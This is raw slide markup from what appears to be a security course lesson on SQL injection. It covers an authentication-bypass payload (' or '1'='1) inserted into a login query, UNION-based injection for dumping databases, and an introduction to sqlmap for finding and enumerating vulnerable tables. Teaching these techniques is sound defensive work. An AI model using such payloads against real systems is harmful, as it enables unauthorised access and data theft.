            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suppose the SQL statement on the server looks like the below, where the username you submit to the form gets substituted in $USERNAME:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="D73A49"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F8FA"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="032F62"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F6F8FA"/>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a:t>What does the statement look like if you substitute you payload for? $USERNAME?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1370" name="Google Shape;1370;p9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71" name="Google Shape;1371;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3041723"/>
            <a:ext cx="9144000" cy="533700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username='admin' or '1'='1'' and password='$PASSWORD'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372" name="Google Shape;1372;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3411638"/>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You might notice an extra quote. How can you modify your payload to remove it? </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>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t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1373" name="Google Shape;1373;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4065253"/>
            <a:ext cx="9144000" cy="702300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username=admin' or '1'='1' and password='$PASSWORD'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1374" name="Google Shape;1374;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374500" y="1491425"/>
            <a:ext cx="8284500" cy="780000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username='$USERNAME' and password='$PASSWORD'</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolat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8" name="Shape 1378"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1379" name="Google Shape;1379;p98"/>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Dumping Databases with UNION</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1380" name="Google Shape;1380;p9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4" name="Shape 1384"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1385" name="Google Shape;1385;p9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UNION</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1386" name="Google Shape;1386;p9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Remember: SELECT statements allow you to extract data from a single table. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1387" name="Google Shape;1387;p9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88" name="Google Shape;1388;p99"/>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t>Relying on SELECT limits our ability to exfiltrate data from a vulnerable application, since we can only retrieve data from whichever table the application gives you access to. </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Injecting OR is also limited because it only allows you to retrieve the columns specified by the developer in the original query. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SELECT first, last FROM users WHERE id=` ` OR `1`=`1`</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>retrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> all row, but only the first and last columns - not password, etc. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UNION is a SQL statement that allows us to retrieve data from multiple tables or select arbitrary columns.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2" name="Shape 1392"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1393" name="Google Shape;1393;p10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94" name="Google Shape;1394;p100"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				UNION Injection</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C232"/>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8" name="Shape 1398"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1399" name="Google Shape;1399;p10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In-Band / Union-based SQL Injection </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1400" name="Google Shape;1400;p10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 the previous demonstration, we retrieved each user’s username and password. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> extracted data not exposed in the original query. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1401" name="Google Shape;1401;p10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02" name="Google Shape;1402;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1535975"/>
            <a:ext cx="9144000" cy="3370500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The application still reported these values and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>First name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Surname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, even though they came from different tables. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We “tricked” it into retrieving data it wasn’t supposed to, so the labels in the view don’t match up to the data. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This is called an </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>In-Band SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, or </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>UNION-based SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>UNION-based SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to dump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>entire</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> databases. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They can also become very complicated to write manually, so most </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>professionals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> rely on automated tools to assist.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8" name="Shape 1058"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p5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60" name="Google Shape;1060;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2581800" y="3548425"/>
            <a:ext cx="3980400" cy="85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SQL Warm-Up</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6" name="Shape 1406"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1407" name="Google Shape;1407;p10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08" name="Google Shape;1408;p102"/>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solidFill>
                  <a:srgbClr val="F1C232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>				sqlmap</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F1C232"/>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2" name="Shape 1412"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1413" name="Google Shape;1413;p10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latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
                <a:sym typeface="Roboto Mono Medium"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono Medium"/>
              <a:ea typeface="Roboto Mono Medium"/>
              <a:cs typeface="Roboto Mono Medium"/>
              <a:sym typeface="Roboto Mono Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1414" name="Google Shape;1414;p10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S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>qlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a popular tool for automated SQL injection. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1415" name="Google Shape;1415;p10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16" name="Google Shape;1416;p103"/>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t>We’ll use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> by:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Testing a URL for injection vulnerabilities. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enumerating the tables in a vulnerable database. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
